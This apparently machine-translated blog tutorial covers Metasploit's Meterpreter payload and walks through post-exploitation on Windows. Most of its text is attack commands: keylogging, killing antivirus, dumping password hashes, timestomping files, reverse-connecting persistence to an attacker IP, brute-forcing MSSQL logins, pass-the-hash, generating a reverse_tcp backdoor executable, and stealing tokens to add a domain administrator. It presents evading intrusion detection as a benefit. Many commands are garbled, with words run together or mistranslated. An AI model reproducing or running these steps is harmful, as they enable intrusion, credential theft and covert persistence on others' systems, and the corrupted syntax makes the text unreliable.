Metasploit is the ShellCode-meterpreter in Windows!
MetasploitFramework is an auxiliary tool used for Buffer Overflow testing. It can also be called a vulnerability exploitation and testing platform. It integrates common overflow vulnerabilities and popular shellcode on various platforms and is constantly updated, this makes the buffer overflow test easy and convenient.
Exploit refers to "vulnerabilities and their exploitation". It exploits all available tools, takes all available methods, and finds all vulnerabilities that can be found. In addition, the vulnerability data is analyzed for some purposes.
Metasploit tool home page is http://www.measoloit.com
Metasploit framework: http://www.metasploit.com/framework/download
In the overflow tool provided in Backtrack5, after the overflow result is obtained, we can get a meterpreter session during the overflow connection.
650) this. width = 650; "style =" width: 523px; height: 124px; "title =" YQALF {M ~ L @ (ODYRN [~ 2ZJ19.jpg "alt =" 113034514.jpg" src = "http://www.bkjia.com/uploads/allimg/131227/09310MA4-0.jpg" width = "451" height = "116"/>
Features of Meterpreter
Meterpreter is an extension module in the metasploit framework. It is used as an attack load after the overflow is successful. The attack load returns a control channel to us after the overflow attack is successful. Use it as the attack load to obtain a meterpretershell link of the target system.
Screen capture, obtain remote control, capture key information, clear applications, display system information of remote hosts, display network interfaces and IP addresses of remote machines, etc.
In addition, meterpreter can avoid intrusion detection systems. Hiding itself on a remote host does not change the files on the system hard disk. Therefore, it is difficult for HIDS to respond to the host-based intrusion detection system. In addition, the system time changes during running, so tracking or terminating it will become very difficult for an experienced person.
Finally, meterpreter can simplify the task to create multiple sessions. These sessions can be used for penetration.
Benefits of meterpreter work:1. Do not create the memory injection mode used by the process) 2. meterpreter is an interpreter that loads various attack commands. 3. It works in the context of the attacked process. 4. Communication is an encrypted TLV protocol ), it can avoid IDS5 and no hard disk write operations. 6. The communication mode is the channel mode. It can work with several channels at the same time and support multi-channel 7 and extended writing.
Meterpreter working process:1. Vulnerability exploitation code + first-stage attack load 2. The attack load is reversely connected to msf3, and the second-stage attack load is sent to dMSF to send meterpreter server dll4, the client and the server for communication
Common system commands:Background sets the current session as the background, when necessary, enable getuid to view the user ps that is running the other party to list all processes. getpid is returned. The idcode of the running meterpreter is sysinfo. The system information and architecture of shell are switched to the cmd system permission. exit and exit. the shell session returns meterpreter or terminates meterpreter.
Process Migration and Elevation of Privilege:Getsystem automatically uses various system vulnerabilities to migrate process IDs.
Establish multiple communication channels with the target:Excuteis used to enable the use of multiple unique communication channels excute-fexploit.exe-cchannel-l to list available communication channels interact and channel interaction to obtain cmd) write3 writes data to the channel, ending '.'
Common file system commands:In pwd, switch the current working directory cd to the desired working directory search-f *. dof-dc: \ search file download supports downloadc: \ a.doc/root download to the local root directory
Upload/root/mm.exe c: \ sys.exe upload to the remote host timestomp to change the File Attribute timestonm:/a.doc-v to view the file time information.
Timestompc:/a.doc-c "9/23/201314: 22: 11" Modify the File Creation Time-m,-a file modification time and last access time. -Z: modify all time. Do not use it whenever possible. -V View
Common network commands:Ipconfig view ip configuration route display route table, you can also configure ip addresses. As with the linux method, routeaddip Address Mask gateway portfwd adds a new forwarding rule with the portfwd-a-L127.0.0.1-l888-h7.6.5.4-p5631-a when doing port forwarding-L the IP address of the target host link 127.0.0.1 port 888, port 5631 forwarded to port 7.6.5.4 enumdesktops is used to list all accessible desktops.
Getdesktop returns the user's desktop setdesktop settings to a session's desktop keyscan_start install the keyboard bug keyscan_dump export the key records of the Active Desktop
About windows desktop number 0 console 12 other sessions or remote login.
Meterpreter script:
Run in runscriptname Mode
① Vnc script, get remote machine vnc interface control meterpreter> runvncmeterpreter> runscreen_unlock
And keep the connection. Example: meterpreter> runpost/windows/manage/migrate in 64-bit win7, migrate requires administrator permission to execute a backdoor to succeed, while the permissions obtained before and after migrate are different .)
③ Disable the anti-virus software meterpreter> runkillav script and use it with caution. This may cause a blue screen crash on the target machine .)
④ Obtaining the system password hashmeterpreter> runhashdump64-bit win7 requires the administrator privilege to execute the backdoor and getsystem first. Then, the success rate of dumphash using runpost/windows/gather/hashdump is higher. If you want to use shell to add a system account, you must first run runpost/windows/escalate/bypassuac in win7, otherwise it may not succeed .)
⑤ Obtain system traffic data meterpreter> runpacktrecorder-i1
⑥ You can do many things: get the password, download the registry, and obtain the system information, etc. meterpreter> runscraper
7 persistent maintenance after the target machine restart can still control meterpreter> runpersistence-X-i50-p443-r192.168.1.111-X boot-I connection timeout-p port-rIP next connection: msf> usemulti/handlersetpayloadwindows/meterpreter/reverse_tcpsetLPOST443setLHOST192.168.1.111exploit (information such as writing files with random file names in the following locations and registries, such as: C: \ Users \ YourtUserName \ AppData \ Local \ Temp \ MXIxVNCy. vbsC: \ Users \ YourtUserName \ AppData \ Local \ Temp \ radF871B. tmp \ svchost.exe HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ DjMzwzCDaoIcgNP)
The merge POST integration module can implement multiple session operations at the same time. For example, to obtain hashmeterpreter> runpost/windows/gather/hashdump, there are many other operations. You can use the TAB key to complete it and then see runpost/<TAB>
650) this. width = 650; "title =" YQALF {M ~ L @ (ODYRN [~ 2ZJ19.jpg "alt =" 112651101.jpg" src = "http://www.bkjia.com/uploads/allimg/131227/09310K134-1.jpg" width = "545" height = "98"/>
When the target system overflows, meterpreter is used as payload to return a shell to the tester, which can be used to execute more operations on the target machine. Example: msf> nmap-sT-A-P0192.168.1.130 # probe open service if you have detected 1433TCP) and 1434 (UDP) Port mssql ), msf> nmap-sU192.168.1.130-P1434 # confirm port open msf> useauxiliary/hosts/mssql/mssql_pingshowoptionssetRHOSTS192.168.1.1/24setTHREADS20exploit
You can obtain the server name, version number, and other information. Msf> useaupoliciary/assets/mssql/mssql_loginshowoptionssetPASS_FILE/pentest/exploits/fasttrack/bin/dict/wordlist.txt Login Brute force password cracking. Next, use the xp_cmdshell function provided by mssql to add an account: msf> useexploit/windows/mssql/mssql_payloadshowoptionssetpayloadwindows/meterpreter/configure. After obtaining a meterpretershell, You can execute more operations: Get Screen: screenshot: sysinfo: meterpreter> prepare process number: 1668: meterpreter> migrate1668 # insert this process meterpreter> runpost/windows/capture/keylog_recorder # Run the record module, save the hit key record to the local txtcat/root /. msf3/loot /*****. txt # obtain the system account and password: meterpreter> useprivmeterpreter> runpost/windows/gather/hashdump. After obtaining the password hash, the plaintext password cannot be cracked and cannot be directly used for hash login, you need to use the pass-the-hash technology: msf> usewindows/smb/export xecsetpayloadwindows/meterpreter/Timeout: b75989f65d1e04af7625ed712ac36c29exploit to obtain the system permission and create a common account, then use this account to execute our backdoor program: Execute netuaerhackerpass/add hacker on the target machine to generate a backdoor program: msfpayloadwindows/meterpreter/reverse_tcpLHOST = 192.168.1.111LPORT = 443X> payload.execopy payload.exe to the target machine and run it with the newly created account.
Execute the local port listening and wait for the connection from the target machine: msfclimulti/handlerPAYLOAD = windows/meterpreter/reverse_tcpLHOST = 192.168.1.111LPORT = 443useprivgetsystemgetuid to obtain the SYSTEM permission.
Token simulation: When a domain control account logs on to the server, you can use the token simulation to perform penetration to obtain the domain control permission. After that, you do not need to log on to other machines. Meterpreter> ps # view the processes on the target machine and find the process ID of the domain controller account, if you find that the PID is 380 meterpreter> steal_token380, sometimes the processes listed by the ps command may not contain the process of the domain controller account, you can use the incognito module to view the available token: meterpreter> useincognitometerpreter> list_tokens-u # list available token, if you find tokenmeterpreter> impersonate_tokenSNEAKS.IN \ ihazdomainadminmeterpreter> add_userhackerpassword-h192.168.1.50 # Add an account meterpreter> add_group_user "DomainAdmins" hacker-h192.168.1.50 # Add an account to the domain administrator Group
This article is from the "no trace" blog, please be sure to keep this source http://hucwuhen.blog.51cto.com/6253667/1303733
